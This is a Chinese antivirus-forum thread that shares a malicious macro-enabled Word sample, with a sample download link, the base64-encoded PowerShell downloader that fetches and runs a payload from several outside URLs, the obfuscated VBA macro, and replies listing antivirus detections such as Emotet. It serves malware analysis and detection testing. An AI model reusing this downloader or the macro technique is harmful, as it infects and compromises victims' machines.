查看: 1985|回复: 14
收起左侧

[病毒样本] #Macro enabled text document# 疑似利用powershell脚本执行命令(2020-8-24)

[复制链接]
川建国代理人
发表于 2020-8-24 19:00:59 | 显示全部楼层 |阅读模式
本帖最后由 川建国代理人 于 2020-8-24 19:05 编辑

https://app.any.run/tasks/9c93d738-d5db-4dbd-bed8-62f8738481e4/ 搬运
https://any.run/report/f2aca1650aa6d407ede3ebb51d393059f5ec04c5b78eaeb2f7543178784ecacc/9c93d738-d5db-4dbd-bed8-62f8738481e4 文本资源策划
蓝奏云下载:https://www.lanzoux.com/ib3uWg0f0ri
此病毒在双击后产生两个进程
进程1:
powersheLL.exe
提取出的powersheLL脚本

  1. powersheLL -e JABHAHoAdQBwAHIAcABmAD0AKAAnAE4AYwAnACsAJwA0ADUAeAB5ACcAKwAnADgAJwApADsAJgAoACcAbgBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAHYAOgB0AGUAbQBwAFwAbwBGAEYASQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIAZQBjAFQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAFUAYABSAEkAYABUAFkAUABSAG8AYABUAG8AYwBPAEwAIgAgAD0AIAAoACcAdABsACcAKwAnAHMAMQAnACsAJwAyACwAIAB0AGwAcwAxACcAKwAnADEALAAgACcAKwAnAHQAbABzACcAKQA7ACQAVQB1AGsAdAB0AHUAYQAgAD0AIAAoACcAUgAnACsAJwBfAG8AJwArACcAMgBjADgAJwArACcAaABqADQAJwApADsAJABaAGgAMQAxAHgAagB6AD0AKAAnAEUAMAAnACsAJwA4AG0AYQA5AGkAJwApADsAJABKAG8AMABuAG8AZwB2AD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwB0AFMANQBPAGYAZgBpAGMAJwArACcAZQAyADAAMQAnACsAJwA5AHQAUwA1ACcAKQAtAEMAUgBlAFAAbABhAGMARQAgACAAJwB0AFMANQAnACwAWwBjAEgAQQBSAF0AOQAyACkAKwAkAFUAdQBrAHQAdAB1AGEAKwAoACcALgBlAHgAJwArACcAZQAnACkAOwAkAFcAbABuADMAZgBlAHgAPQAoACcAVwAnACsAJwB1AGYAJwArACcAagBtAG4AcgAnACkAOwAkAEoAbwBxADIAZQBhAGsAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AVwBFAEIAQwBMAGkARQBuAFQAOwAkAEwAbwA3ADMAMwBhAGoAPQAoACcAaAB0AHQAJwArACcAcAA6AC8ALwBjAHIAeQBwAHQAbwBrAHUAJwArACcAbwB0ACcAKwAnAGEALgAnACsAJwBjAG8AbQAvAGEAcwBzAGUAdAAnACsAJwBzAC8AJwArACcAYQB5AFEAVQB0AG4AZAA0ACcAKwAnADAAMwAvACoAaAB0AHQAJwArACcAcAA6AC8ALwBmAGcAYQBqAGEAcgAnACsAJwBkAG8ALgAnACsAJwBjAG8AJwArACcAbQAvAHAAcgB1AGUAYgAnACsAJwBhAHMALwBpAFQAZgBWACcAKwAnAHoASgBpAE4AJwArACcARwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcABoAGEAcgBtAGEALQBpACcAKwAnAHMAcgBhAGUAJwArACcAbAAuACcAKwAnAG8AcgBnAC4AaQBsAC8AdwBwAC0AYwBvAG4AJwArACcAdABlACcAKwAnAG4AdAAvAG8AJwArACcASgBTAFUAQwAvACoAaAB0AHQAcAA6AC8ALwBwAG8AcAB3AGUAYgAuAGMAJwArACcAbwBtAC4AYgByAC8AcgBlACcAKwAnAG0AZQBkACcAKwAnAGkAbwAnACsAJwBzAC8AUQBVAFMAQQByAEEAUwAnACsAJwBEAEkASQBkAFAAegAvACoAJwArACcAaAB0AHQAcAA6AC8ALwAnACsAJwBtACcAKwAnAGUAZwBhAHMAJwArACcAbwBsACcAKwAnAHUAJwArACcAYwBvAGUAcwB0AGkALgBjACcAKwAnAG8AbQAvAFIAOQBLAEQAcQAwAE8AOAB3AC8AbQBnADcAZQAnACsAJwAxACcAKwAnADIAOQAnACsAJwAzADcAMAAvACoAaAAnACsAJwB0AHQAcAA6AC8ALwBpAGQAZQBhAGwAbABpAC4AYwBvAG0ALgBiAHIAJwArACcALwBqAG8AJwArACcAdQByAG4AYQBsAC8AbABoACcAKwAnAGEAJwArACcAYwBpADUAJwArACcAaQA1ADMAMQA1ACcAKwAnAC8AJwArACcAKgBoAHQAdABwADoALwAvACcAKwAnAGEAaQByAG0AYQB4AHgAJwArACcALgByAHMALwBNAGIASwBvAHEAcwAnACsAJwBTAEwAJwArACcALwAnACkALgAiAFMAYABwAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUQBvAHEAOQA1ADMAcAA9ACgAJwBEACcAKwAnADEAJwArACcAcwA5AGIAbQAwACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMQBsAHEAeQBxADIAIABpAG4AIAAkAEwAbwA3ADMAMwBhAGoAKQB7AHQAcgB5AHsAJABKAG8AcQAyAGUAYQBrAC4AIgBEAE8AdwBuAGAATABvAGEAYABEAEYASQBsAGUAIgAoACQAVgAxAGwAcQB5AHEAMgAsACAAJABKAG8AMABuAG8AZwB2ACkAOwAkAE4AeABiADgANwBiADgAPQAoACcATwBuACcAKwAnADYAZABkACcAKwAnAHAAdgAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQASgBvADAAbgBvAGcAdgApAC4AIgBsAEUAYABOAGcAVABIACIAIAAtAGcAZQAgADMANgAzADkANwApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAJwArACcAdABlACcAKwAnAG0AJwApACgAJABKAG8AMABuAG8AZwB2ACkAOwAkAFAAMQB3AHMAbAB3AGQAPQAoACcAVgAnACsAJwB5AHAAeAB6AGwAJwArACcAdQAnACkAOwBiAHIAZQBhAGsAOwAkAFMAMwAxAGwAdgBwAHYAPQAoACcAUAAnACsAJwBuAHIAOQBtAHIAJwArACcAegAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAcQBxAHcAbgAwAGgAPQAoACcAWgBfAGMAbwByAGgAJwArACcANwAnACkA
复制代码
进程2:
  1. WINWORD.EXE(PID:1516)
  2. "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\vbccsb\AppData\Local\Temp\INV__93575_FOR_PO__247460898.doc
复制代码
此病毒嵌入的两组宏代码:
  1. Private Sub _
  2. Document_open()
  3. Wp35pqwk8ph.Ejvmmjluurap_
  4. End Sub
复制代码
  1. Function Ejvmmjluurap_()
  2.       On Error Resume Next
  3.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  4.    Set WPYV57 = Wp35pqwk8ph
  5. I256tohnbw4qu9ld4i = 100
  6.       On Error Resume Next
  7.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  8.    Set WPYV57 = Wp35pqwk8ph
  9. F6ef8msrj95zeptn2_ = ChrW(I256tohnbw4qu9ld4i + (15))
  10.       On Error Resume Next
  11.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  12.    Set WPYV57 = Wp35pqwk8ph
  13. Vx1i9w_x8z9w4wruc = "3%hs8( 8192&&&21gs [[]asd2[3%hs8( 8192&&&21gs [[]asd2[w3%hs8( 8192&&&21gs [[]asd2[i3%hs8( 8192&&&21gs [[]asd2[nm3%hs8( 8192&&&21gs [[]asd2[3%hs8( 8192&&&21gs [[]asd2[gm3%hs8( 8192&&&21gs [[]asd2[t3%hs8( 8192&&&21gs [[]asd2[3%hs8( 8192&&&21gs [[]asd2[" + F6ef8msrj95zeptn2_ + "3%hs8( 8192&&&21gs [[]asd2[3%hs8( 8192&&&21gs [[]asd2[:3%hs8( 8192&&&21gs [[]asd2[w3%hs8( 8192&&&21gs [[]asd2[in3%hs8( 8192&&&21gs [[]asd2[3%hs8( 8192&&&21gs [[]asd2[33%hs8( 8192&&&21gs [[]asd2[23%hs8( 8192&&&21gs [[]asd2[_3%hs8( 8192&&&21gs [[]asd2[" + Wp35pqwk8ph.Kkyol7j6j_bn88 + "3%hs8( 8192&&&21gs [[]asd2[ro3%hs8( 8192&&&21gs [[]asd2[3%hs8( 8192&&&21gs [[]asd2[ce3%hs8( 8192&&&21gs [[]asd2[s3%hs8( 8192&&&21gs [[]asd2[s3%hs8( 8192&&&21gs [[]asd2["
  14.       On Error Resume Next
  15.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  16.    Set WPYV57 = Wp35pqwk8ph
  17. Qcmwjbvfsokyrk = Utlpd3v7may(Vx1i9w_x8z9w4wruc)
  18.       On Error Resume Next
  19.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  20.    Set WPYV57 = Wp35pqwk8ph
  21. Set X52r8hsx9gs = CreateObject(Qcmwjbvfsokyrk)
  22.       On Error Resume Next
  23.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  24.    Set WPYV57 = Wp35pqwk8ph
  25. H__9_ave3efc5 = Wp35pqwk8ph.B2svt9fmdxvo.ControlTipText
  26.       On Error Resume Next
  27.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  28.    Set WPYV57 = Wp35pqwk8ph
  29. T7w__pybvq_p6v = Zp14fu9o5na2bi + (Qcmwjbvfsokyrk + F6ef8msrj95zeptn2_ + Wp35pqwk8ph.Yztwf1vzbwpj9clph.ControlTipText + H__9_ave3efc5)
  30.       On Error Resume Next
  31.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  32.    Set WPYV57 = Wp35pqwk8ph
  33. X_6_4ob6aenq = T7w__pybvq_p6v + Wp35pqwk8ph.Kkyol7j6j_bn88
  34.       On Error Resume Next
  35.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  36.    Set WPYV57 = Wp35pqwk8ph
  37. Set Hzg1r1vu06ahf9x8k = Naalszavwy9mk3xa(X_6_4ob6aenq)
  38.       On Error Resume Next
  39.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  40.    Set WPYV57 = Wp35pqwk8ph
  41. Lq7729rl3b6t = Array(Cpglmjte4fdarmy7t + "H42dog2zuse Ulbflpgzp4zayl37jvLi9v1b_aavyzb_6n4 Ibjz6zrd1qcp6q0zz1", X52r8hsx9gs.Create(Mn0y4i3rb1ifk, Smdloge2dya40099u, Hzg1r1vu06ahf9x8k), Tojdwmu0v1i2mlf + "Bxi27s19op1yeq9 Le9lvx133qvptnm Qp8kz4zjzl1gw85f Slhn60q8q0p8load_")
  42.       On Error Resume Next
  43.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  44.    Set WPYV57 = Wp35pqwk8ph
  45. End Function
  46. Function Naalszavwy9mk3xa(Ao1rk55b6lk50o2lec)
  47.       On Error Resume Next
  48.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  49.    Set WPYV57 = Wp35pqwk8ph
  50. Set Naalszavwy9mk3xa = CreateObject(Ao1rk55b6lk50o2lec)
  51.       On Error Resume Next
  52.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  53.    Set WPYV57 = Wp35pqwk8ph
  54. Naalszavwy9mk3xa. _
  55. showwindow = Wp35pqwk8ph.BorderStyle + Wp35pqwk8ph.HelpContextId
  56.       On Error Resume Next
  57.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  58.    Set WPYV57 = Wp35pqwk8ph
  59. End Function
  60. Function Utlpd3v7may(Mkhh7gk030v8y3)
  61.       On Error Resume Next
  62.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  63.    Set WPYV57 = Wp35pqwk8ph
  64. Tux0cnf0npc = Trim(Conversion.CVar((Mkhh7gk030v8y3)))
  65.       On Error Resume Next
  66.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  67.    Set WPYV57 = Wp35pqwk8ph
  68. Eighkxn12yj = Split(Tux0cnf0npc, "3%hs8( 8192&&&21gs [[]asd2[")
  69.       On Error Resume Next
  70.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  71.    Set WPYV57 = Wp35pqwk8ph
  72. Afz21j6yj2zj = Stx5wqzxj8t + Join(Eighkxn12yj, Wwqx5bem4rro)
  73.       On Error Resume Next
  74.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  75.    Set WPYV57 = Wp35pqwk8ph
  76. Utlpd3v7may = Afz21j6yj2zj
  77.       On Error Resume Next
  78.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  79.    Set WPYV57 = Wp35pqwk8ph
  80. End Function
  81. Function Mn0y4i3rb1ifk()
  82.       On Error Resume Next
  83.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  84.    Set WPYV57 = Wp35pqwk8ph
  85. Vl213i6cw6lls32 = Wp35pqwk8ph.H511d9tsfl33uv.Tabs(1).ControlTipText
  86.       On Error Resume Next
  87.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  88.    Set WPYV57 = Wp35pqwk8ph
  89. Mn0y4i3rb1ifk = Utlpd3v7may(Vl213i6cw6lls32)
  90.       On Error Resume Next
  91.    lMYh54 = (YbktGf7 / 1 - 919 * CSng(89 * Tan(vAqg0) * VEgJ2VN4C * 3929) * 6 - CBool(Lll / Rnd(rzqbwM4c)))
  92.    Set WPYV57 = Wp35pqwk8ph
  93. End Function
复制代码
Object Linking and Embedding:
  1. -        '\x01CompObj'        114
  2. -        '\x05DocumentSummaryInformation'        352
  3. -        '\x05SummaryInformation'        420
  4. -        '1Table'        7035
  5. -        'Data'        160565
  6. -        'Macros/PROJECT'        519
  7. -        'Macros/PROJECTwm'        92
  8. M        'Macros/VBA/Klmtippf3sofr8e7_'        1334
  9. M        'Macros/VBA/Wp35pqwk8ph'        8174
  10. -        'Macros/VBA/_VBA_PROJECT'        13120
  11. -        'Macros/VBA/__SRP_0'        1541
  12. -        'Macros/VBA/__SRP_1'        106
  13. -        'Macros/VBA/__SRP_2'        304
  14. -        'Macros/VBA/__SRP_3'        103
  15. -        'Macros/VBA/dir'        863
  16. -        'Macros/Wp35pqwk8ph/\x01CompObj'        97
  17. -        'Macros/Wp35pqwk8ph/\x03VBFrame'        295
  18. -        'Macros/Wp35pqwk8ph/f'        506
  19. -        'Macros/Wp35pqwk8ph/i05/\x01CompObj'        112
  20. -        'Macros/Wp35pqwk8ph/i05/f'        44
  21. -        'Macros/Wp35pqwk8ph/i05/o'        0
  22. -        'Macros/Wp35pqwk8ph/i07/\x01CompObj'        112
  23. -        'Macros/Wp35pqwk8ph/i07/f'        44
  24. -        'Macros/Wp35pqwk8ph/i07/o'        0
  25. -        'Macros/Wp35pqwk8ph/o'        21048
  26. -        'WordDocument'        4096
复制代码

αdmin
头像被屏蔽
发表于 2020-8-24 19:08:54 | 显示全部楼层
智量清空
Kaspersky用户
发表于 2020-8-24 19:12:54 | 显示全部楼层
Avira Free落地监控KILL
HEUR/Macro.Agent
jdsh
发表于 2020-8-24 19:25:08 | 显示全部楼层
Trend Micro Apex One

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
浪里个浪9527
头像被屏蔽
发表于 2020-8-24 19:25:42 | 显示全部楼层
360TS

类型:
virus.office.qexvmc.1090
扫描引擎:
QEX脚本查杀引擎
文件路径:
C:\Users\Administrator\Desktop\INV _93575 FOR PO _247460898.doc\INV _93575 FOR PO _247460898.doc
文件大小:
234K (239,579 字节)
文件指纹(MD5):
28f700abc8a96ddf4b0e008b7c9075fb
数字签名是否有效:
无效
处理建议:
修复文件


intherain
发表于 2020-8-24 19:28:59 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
anthonyqian
发表于 2020-8-24 19:47:31 | 显示全部楼层
卡巴 UDS:Trojan.MSOffice.SAgent.gen;;木马程序;高;确切;已删除;今天,2020/8/24 19:46
a233
发表于 2020-8-24 19:49:11 | 显示全部楼层
Avast
Script:SNH-gen [Trj]
Nocria
发表于 2020-8-24 20:05:59 | 显示全部楼层
IK

  1. Date and Time: 24/08/2020 20:05:33
  2. File Name: INV _93575 FOR PO _247460898.doc
  3. Original Path: C:\Users\promi\Desktop\INV _93575 FOR PO _247460898.doc\
  4. File Size: 233.96 kB
  5. Detection Name: Trojan-Downloader.VBA.Emotet
  6. Detection-ID: 3899201
  7. Suggestion: Backup and Delete
复制代码
WAR314159
发表于 2020-8-24 21:17:03 | 显示全部楼层
ESET KILL
  1. 时间;扫描程序;对象类型;对象;检测;操作;用户;信息;哈希;此处首次所见
  2. 2020/8/24 21:16:28;文件系统实时防护;文件;C:\Users\周华鑫\AppData\Local\Temp\BNZ.5f43bda957547\INV _93575 FOR PO _247460898.doc;VBA/TrojanDownloader.Agent.UDM 特洛伊木马;通过删除清除;DESKTOP-PTTR5MT\周华鑫;在应用程序新建的文件上发生事件: C:\Program Files\Bandizip\Bandizip.exe (A9BD518A10AF92E3BB185B82C24118DA30BCCB01).;101F904A81905EC79BA64C4202668C24D252F9C5;2020/8/24 18:39:16
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-8 20:47 , Processed in 0.168427 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表